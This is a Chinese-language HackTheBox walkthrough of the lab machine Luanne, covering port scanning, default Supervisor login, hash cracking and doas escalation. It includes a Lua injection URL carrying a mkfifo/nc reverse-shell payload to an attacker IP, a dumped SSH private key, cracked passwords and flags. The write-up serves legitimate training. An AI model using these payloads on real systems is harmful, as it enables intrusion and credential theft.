Luanne-htb-writeup

0x00 靶场技能介绍

章节技能：代码注入、md5破解、目录枚举、默认口令、进程分析、netpgp 工具、doas提权

参考链接：https://www.jgeek.cn/article/89

参考链接：https://r0ck-blog.github.io/2021/04/01/luanne/

0x01 用户权限获取

1、获取下靶机IP地址：10.10.10.218

2、测试下靶机的连通率

┌──(kali㉿kali)-[~/桌面]
└─$ ping 10.10.10.218 -c 4     
PING 10.10.10.218 (10.10.10.218) 56(84) bytes of data.
64 bytes from 10.10.10.218: icmp_seq=1 ttl=254 time=280 ms
64 bytes from 10.10.10.218: icmp_seq=2 ttl=254 time=294 ms
64 bytes from 10.10.10.218: icmp_seq=3 ttl=254 time=278 ms
64 bytes from 10.10.10.218: icmp_seq=4 ttl=254 time=275 ms

--- 10.10.10.218 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3002ms
rtt min/avg/max/mdev = 274.766/281.735/294.153/7.386 ms

3、获取下开放端口情况

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- --min-rate=10000 -oG braker-allports 10.10.10.218
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-23 22:03 CST
Warning: 10.10.10.218 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.218
Host is up (0.29s latency).
Not shown: 58749 filtered tcp ports (no-response), 6783 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9001/tcp open  tor-orport

Nmap done: 1 IP address (1 host up) scanned in 72.92 seconds
                                                                                         
┌──(kali㉿kali)-[~/桌面]
└─$ grep -oP '([0-9]+)/open' braker-allports | awk -F/ '{print $1}' | tr '\n' ',' 
22,80,9001,                                                                                         
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80,9001 10.10.10.218          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-23 22:07 CST
Nmap scan report for 10.10.10.218
Host is up (0.30s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
| ssh-hostkey: 
|   3072 20:97:7f:6c:4a:6e:5d:20:cf:fd:a3:aa:a9:0d:37:db (RSA)
|   521 35:c3:29:e1:87:70:6d:73:74:b2:a9:a2:04:a9:66:69 (ECDSA)
|_  256 b3:bd:31:6d:cc:22:6b:18:ed:27:66:b4:a7:2a:e4:a5 (ED25519)
80/tcp   open  http    nginx 1.19.0
|_http-server-header: nginx/1.19.0
|_http-title: 401 Unauthorized
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=.
| http-robots.txt: 1 disallowed entry 
|_/weather
9001/tcp open  http    Medusa httpd 1.12 (Supervisor process manager)
|_http-title: Error response
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=default
|_http-server-header: Medusa/1.12
Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 191.52 seconds

4、访问80端口是一个401认证，访问9001同样也是，但是在nmap扫描时，我们知道这个是 Supervisor process manager 服务，所以我们搜索下默认口令

supervisor process manager default password

5、这里使用 username = user password = 123 成功进入界面中

6、到这里就没有发现什么信息了，通过继续对80端口的目录扫描发现了 robots.txt 中泄露一些信息

┌──(kali㉿kali)-[~/桌面]
└─$ curl http://10.10.10.218/robots.txt
User-agent: *
Disallow: /weather  #returning 404 but still harvesting cities 

7、然后继续使用目录扫描工具进行扫描，由于我的网络和字典的原因并没有扫描出什么有用的信息，这时根据查看演示文档，发现了 /forecast 目录，以下引用演示文档的提示

我们来看看http://luanne/weather/forecast。

该JSON文档说我们需要使用名为 的参数city来获取更多数据。通过执行，我可以获得所有可用的城市，然后我可以通过执行以下操作city=list来获得特定城市的预测。city=London

我从端口 9001 知道lua后面有一个脚本，所以我的猜测是我们可能会尝试使用该city参数，看看它是否容易受到攻击。

为此，我喜欢使用 ZAP Proxy。我的目标是强制网站显示错误消息。我喜欢做的第一个测试是检查脚本是否正确清理输入。因此，我在城市名称后面加了一个“”。像这样：

/forecast (Status: 200)

8、这个网络接口是一个城市信息显示的一个接口，存在一些RCE的漏洞

http://10.10.10.218/weather/forecast?city=%27)%20os.execute(%27id%27)--+--

9、通过上述命令可以发现是可以直接执行命令的，那接下来就是获取第一个初始权限了

/weather/forecast?city=')+os.execute('rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.2+443+>/tmp/f')--%2b--

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.218] 65493
sh: can't access tty; job control turned off
$ id
uid=24(_httpd) gid=24(_httpd) groups=24(_httpd)

10、通过信息枚举，我们发现了想要获取第一个flag信息，需要 获取到 r.michaels 用户的权限

$ ls
index.html
robots.txt
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
sh: python3: not found
$ ls -la /home
total 12
drwxr-xr-x   3 root        wheel  512 Sep 14  2020 .
drwxr-xr-x  21 root        wheel  512 Sep 16  2020 ..
dr-xr-x---   7 r.michaels  users  512 Sep 16  2020 r.michaels
$ cat r.michaels
cat: r.michaels: No such file or directory
$ cat /home/r.michaels
cat: /home/r.michaels: Permission denied
$ ls /home/r.michaels
ls: r.michaels: Permission denied
$ 

11、在当前网站的目录下，我们发现了在 .htpasswd 中存在一个md5加密的密文

$ pwd
/var/www
$ ls -la
total 20
drwxr-xr-x   2 root  wheel  512 Nov 25  2020 .
drwxr-xr-x  24 root  wheel  512 Nov 24  2020 ..
-rw-r--r--   1 root  wheel   47 Sep 16  2020 .htpasswd
-rw-r--r--   1 root  wheel  386 Sep 17  2020 index.html
-rw-r--r--   1 root  wheel   78 Nov 25  2020 robots.txt
$ cat .htpasswd
webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0
$ 

12、通过somd5网站成功破解出密码：iamthebest

13、但是并无法成功的切换到目标用户，可能是用作其他使用的密码吧

14、通过查询 r.michaels 用户的进程信息，发现了一个本地服务

$ ps ax -U r.michaels
 PID TTY   STAT    TIME COMMAND
 204 ?     Is   0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3001 -L wea
 591 ?     I    0:00.08 sshd: r.michaels@pts/0 (sshd)
2776 pts/0 Is+  0:00.03 -ksh 
$ 

$ sockstat -4l
USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS
root     syslogd    167    3 tcp    *.etlservicemgr       *.*
r.michaels httpd      204    3 tcp    *.etlservicemgr       *.*
r.michaels httpd      204    4 tcp    *.etlservicemgr       *.*
nginx    nginx      239    7 tcp    *.etlservicemgr       *.*
nginx    nginx      239    8 tcp    *.etlservicemgr       *.*
_httpd   httpd      331    3 tcp    *.etlservicemgr       *.*
_httpd   httpd      331    4 tcp    *.etlservicemgr       *.*
_httpd   python3.8  339    6 tcp    *.etlservicemgr       *.*
_httpd   python3.8  339    7 tcp    *.etlservicemgr       *.*
root     nginx      345    3 tcp    *.etlservicemgr       *.*
root     nginx      345    7 tcp    *.etlservicemgr       *.*
root     nginx      345    8 tcp    *.etlservicemgr       *.*
root     sshd       346    3 tcp    *.etlservicemgr       *.*
root     sshd       346    5 tcp    *.etlservicemgr       *.*
root     sshd       346    6 tcp    *.etlservicemgr       *.*
root     sshd       346    7 tcp    *.etlservicemgr       *.*
r.michaels sshd       591    3 tcp    *.etlservicemgr       *.*
r.michaels sshd       591    4 tcp    *.etlservicemgr       *.*
r.michaels sshd       591    7 tcp    *.etlservicemgr       *.*
r.michaels sshd       591    9 tcp    *.etlservicemgr       *.*
root     sshd       606    4 tcp    *.etlservicemgr       *.*
root     sshd       606    5 tcp    *.etlservicemgr       *.*
root     sshd       606    7 tcp    *.etlservicemgr       *.*
root     sshd       606    9 tcp    *.etlservicemgr       *.*
_httpd   httpd      2395   0 tcp    *.etlservicemgr       *.*
_httpd   httpd      2395   1 tcp    *.etlservicemgr       *.*
_httpd   httpd      2395   3 tcp    *.etlservicemgr       *.*
_httpd   httpd      2395   4 tcp    *.etlservicemgr       *.*
_httpd   cat        2397   0 tcp    *.etlservicemgr       *.*
_httpd   cat        2397   4 tcp    *.etlservicemgr       *.*
_httpd   nc         2424   3 tcp    *.etlservicemgr       *.*
_httpd   nc         2424   4 tcp    *.etlservicemgr       *.*
_httpd   sh         2516   0 tcp    *.etlservicemgr       *.*
_httpd   sh         2516   1 tcp    *.etlservicemgr       *.*
_httpd   sh         2516   4 tcp    *.etlservicemgr       *.*
_httpd   sh         2518   4 tcp    *.etlservicemgr       *.*
_httpd   sockstat   3013   4 tcp    *.etlservicemgr       *.*
$ 

$ ps -auxwww
USER        PID %CPU %MEM    VSZ   RSS TTY   STAT STARTED    TIME COMMAND
root          0  0.0  0.2      0 12812 ?     OKl   2:01PM 0:01.47 [system]
root          1  0.0  0.0  23468  1528 ?     Is    2:01PM 0:00.01 init 
root        167  0.0  0.0  33848  2272 ?     Ss    2:01PM 0:00.02 /usr/sbin/syslogd -s 
r.michaels  204  0.0  0.0  37956  1976 ?     Is    2:01PM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3001 -L weather /home/r.michaels/devel/webapi/weather.lua -P /var/run/httpd_devel.pid -U r.michaels -b /home/r.michaels/devel/www 
nginx       239  0.0  0.1  33924  3244 ?     I     2:01PM 0:05.73 nginx: worker process 
_httpd      289  0.0  0.0  19856  1528 ?     O     2:48PM 0:00.00 ps -auxwww 
root        304  0.0  0.0  19708  1344 ?     Is    2:01PM 0:00.00 /usr/sbin/powerd 
root        318  0.0  0.1 117948  7164 ?     Il    2:01PM 0:02.87 /usr/pkg/bin/vmtoolsd 
_httpd      331  0.0  0.0  34956  2000 ?     Is    2:01PM 0:00.01 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3000 -L weather /usr/local/webapi/weather.lua -U _httpd -b /var/www 
_httpd      339  0.0  0.3 118448 16240 ?     Ss    2:01PM 0:01.47 /usr/pkg/bin/python3.8 /usr/pkg/bin/supervisord-3.8 
root        345  0.0  0.0  33368  1828 ?     Is    2:01PM 0:00.00 nginx: master process /usr/pkg/sbin/nginx 
root        346  0.0  0.0  71348  2916 ?     Is    2:01PM 0:00.01 /usr/sbin/sshd 
root        402  0.0  0.0  20216  1648 ?     Ss    2:01PM 0:00.01 /usr/sbin/cron 
_httpd      420  0.0  0.0  19988  1648 ?     S     2:01PM 0:00.05 /bin/sh /usr/local/scripts/memory.sh 
_httpd      421  0.0  0.0  20020  1660 ?     S     2:01PM 0:00.09 /bin/sh /usr/local/scripts/processes.sh 
_httpd      426  0.0  0.0  19992  1656 ?     S     2:01PM 0:00.04 /bin/sh /usr/local/scripts/uptime.sh 
_httpd      478  0.0  0.0  18108  1388 ?     S     2:48PM 0:00.00 sleep 30 
_httpd      479  0.0  0.0  17636  1388 ?     S     2:48PM 0:00.00 sleep 30 
_httpd      645  0.0  0.0  17636  1380 ?     S     2:48PM 0:00.00 sleep 30 
_httpd     2395  0.0  0.0  35256  2328 ?     I     2:41PM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3000 -L weather /usr/local/webapi/weather.lua -U _httpd -b /var/www 
_httpd     2397  0.0  0.0  15436  1280 ?     S     2:41PM 0:00.00 cat /tmp/f 
_httpd     2424  0.0  0.0  15952  1400 ?     S     2:41PM 0:00.00 nc 10.10.14.2 443 
_httpd     2516  0.0  0.0  23480  1712 ?     I     2:41PM 0:00.00 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 443 >/tmp/f 
_httpd     2518  0.0  0.0  20796  1720 ?     S     2:41PM 0:00.01 /bin/sh -i 
root        419  0.0  0.0  19784  1588 ttyE0 Is+   2:01PM 0:00.00 /usr/libexec/getty Pc constty 
root        407  0.0  0.0  19780  1584 ttyE1 Is+   2:01PM 0:00.00 /usr/libexec/getty Pc ttyE1 
root        390  0.0  0.0  19780  1580 ttyE2 Is+   2:01PM 0:00.00 /usr/libexec/getty Pc ttyE2 
root        433  0.0  0.0  19780  1588 ttyE3 Is+   2:01PM 0:00.00 /usr/libexec/getty Pc ttyE3 
$ 

15、这个时候就触及到知识盲区了，但是根据演示报告，可以了解到本地的服务其实有认证限制，可以使用上面破解的密码来突破这个验证，来获取到信息

回想第一部分，参数-u可以将 URL 转换为本地目录。这意味着我们可以通过 url 浏览本地文件夹。

传统上，在 Unix 系统上，特定用户的主目录可以称为 ~user/。mod_userdir 模块将这一想法扩展到 Web，允许使用如下 URL 访问每个用户主目录下的文件。http://www.example.com/~user/file.html 出于安全原因，从 Web 直接访问用户的主目录是不合适的。因此，UserDir 指令指定用户主目录下 Web 文件所在的目录。使用 Userdir public_html 的默认设置，上面的 URL 映射到 /home/user/public_html/file.html 等目录中的文件，其中 /home/user/ 是 /etc/passwd 中指定的用户主目录。

基本上，如果我访问服务器然后添加~r.michaels到网址，我也许能够访问主目录public_html中的文件夹。r.michaels

第一个问题是，如果我尝试访问http://127.0.0.1:3001，我会收到未经授权的错误消息。所以我们需要授权自己连接到主页。如果您还记得的话，我们在第一次使用这些凭据时就做到了这一点：

-用户：webapi_user -pw：iamthebest

如果幸运的话，该实例上的信用信息是相同的。通过分析我们在第一个实例上连接时发出的请求，我可以看到授权是通过发送附加标头值（授权）来进行的：

16、这时使用curl来获取本地服务的目录信息

$ curl --user webapi_user:iamthebest "127.0.0.1:3001/~r.michaels/"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   601    0   601    0     0   146k      0 --:--:-- --:--:-- --:--:--  146k
<!DOCTYPE html>
<html><head><meta charset="utf-8"/>
<style type="text/css">
table {
        border-top: 1px solid black;
        border-bottom: 1px solid black;
}
th { background: aquamarine; }
tr:nth-child(even) { background: lavender; }
</style>
<title>Index of ~r.michaels/</title></head>
<body><h1>Index of ~r.michaels/</h1>
<table cols=3>
<thead>
<tr><th>Name<th>Last modified<th align=right>Size
<tbody>
<tr><td><a href="../">Parent Directory</a><td>16-Sep-2020 18:20<td align=right>1kB
<tr><td><a href="id_rsa">id_rsa</a><td>16-Sep-2020 16:52<td align=right>3kB
</table>
</body></html>

17、发现存在id_rsa文件，继续进行尝试获取

$ curl --user webapi_user:iamthebest "127.0.0.1:3001/~r.michaels/id_rsa"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2610  100  2610    0     0   637k      0 --:--:-- --:--:-- --:--:--  637k
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
$ 

18、本地保存下秘钥信息，并获取到第一个flag信息

┌──(kali㉿kali)-[~/桌面]
└─$ touch id_rsa    

┌──(kali㉿kali)-[~/桌面]
└─$ ssh r.michaels@10.10.10.218 -i id_rsa      
The authenticity of host '10.10.10.218 (10.10.10.218)' can't be established.
ED25519 key fingerprint is SHA256:CpUy86JD75uIN94DGIDjXPkDK7Rsu1Du3NtIfPctVnc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.218' (ED25519) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
r.michaels@10.10.10.218: Permission denied (publickey).

┌──(kali㉿kali)-[~/桌面]
└─$ chmod 600 id_rsa

┌──(kali㉿kali)-[~/桌面]
└─$ ssh r.michaels@10.10.10.218 -i id_rsa
Last login: Fri Sep 18 07:06:51 2020
NetBSD 9.0 (GENERIC) #0: Fri Feb 14 00:06:28 UTC 2020

Welcome to NetBSD!

luanne$ ls
backups     devel       public_html user.txt
luanne$ cat user.txt
ea5f0ce6a917b0be1eabc7f9218febc0

0x02 系统权限获取

19、通过查看本地目录下信息，发现了一个压缩包文件

luanne$ ls -la
total 52
dr-xr-x---  7 r.michaels  users   512 Sep 16  2020 .
drwxr-xr-x  3 root        wheel   512 Sep 14  2020 ..
-rw-r--r--  1 r.michaels  users  1772 Feb 14  2020 .cshrc
drwx------  2 r.michaels  users   512 Sep 14  2020 .gnupg
-rw-r--r--  1 r.michaels  users   431 Feb 14  2020 .login
-rw-r--r--  1 r.michaels  users   265 Feb 14  2020 .logout
-rw-r--r--  1 r.michaels  users  1498 Feb 14  2020 .profile
-rw-r--r--  1 r.michaels  users   166 Feb 14  2020 .shrc
dr-x------  2 r.michaels  users   512 Sep 16  2020 .ssh
dr-xr-xr-x  2 r.michaels  users   512 Nov 24  2020 backups
dr-xr-x---  4 r.michaels  users   512 Sep 16  2020 devel
dr-x------  2 r.michaels  users   512 Sep 16  2020 public_html
-r--------  1 r.michaels  users    33 Sep 16  2020 user.txt
luanne$ 
luanne$ cd backups
luanne$ ls -la
total 12
dr-xr-xr-x  2 r.michaels  users   512 Nov 24  2020 .
dr-xr-x---  7 r.michaels  users   512 Sep 16  2020 ..
-r--------  1 r.michaels  users  1970 Nov 24  2020 devel_backup-2020-09-16.tar.gz.enc
luanne$

20、经过了解，该文件格式需要进行解压，这时使用命令进行解码并输出

先利用netpgp对文件进行解码，为保证文件完整性将其保存成Base64格式数据，随后将Base64编码内容还原成二进制内容，通过PE头信息去 https://www.filesignatures.net/index.php 网站查询文件最终格式。

netpgp --decrypt --output=/var/mail/backup.tar.gz ./devel_backup-2020-09-16.tar.gz.enc

cd /var/mail/ && tar -xvf backup.tar.gz

luanne$ pwd
/home/r.michaels/backups
up.tar.gz ./devel_backup-2020-09-16.tar.gz.enc                                         <
signature  2048/RSA (Encrypt or Sign) 3684eb1e5ded454a 2020-09-14 
Key fingerprint: 027a 3243 0691 2e46 0c29 9f46 3684 eb1e 5ded 454a 
uid              RSA 2048-bit key <r.michaels@localhost>
luanne$ cd /var/mail/ && tar -xvf backup.tar.gz
x devel-2020-09-16/
x devel-2020-09-16/www/
x devel-2020-09-16/webapi/
x devel-2020-09-16/webapi/weather.lua
x devel-2020-09-16/www/index.html
x devel-2020-09-16/www/.htpasswd
luanne$ ls
backup.tar.gz    devel-2020-09-16 r.michaels
luanne$ pwd
/var/mail
luanne$ cat devel-2020-09-16/www/.htpasswd
webapi_user:$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.
luanne$ 

21、通过这里，有获取到了一个md5的秘钥信息，继续使用md5进行破解：littlebear

22、然后这个时候使用 linpeas.sh ，可以看到当前用户可以执行 doas 命令

==================== Useful software
/usr/pkg/bin/doas

23、doas – 以另一个用户身份执行命令，通过检索发现相关使用方法，然后使用中，发现需要输入密码，结果使用上述解密的密码就可以破解登录，至此获取到最终flag信息

luanne$ doas -u root su
Password:
# id
uid=0(root) gid=0(wheel) groups=0(wheel),2(kmem),3(sys),4(tty),5(operator),20(staff),31(guest),34(nvmm)
# cat /root/root.txt
7a9b5c206e8e8ba09bb99bd113675f66
# 

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/302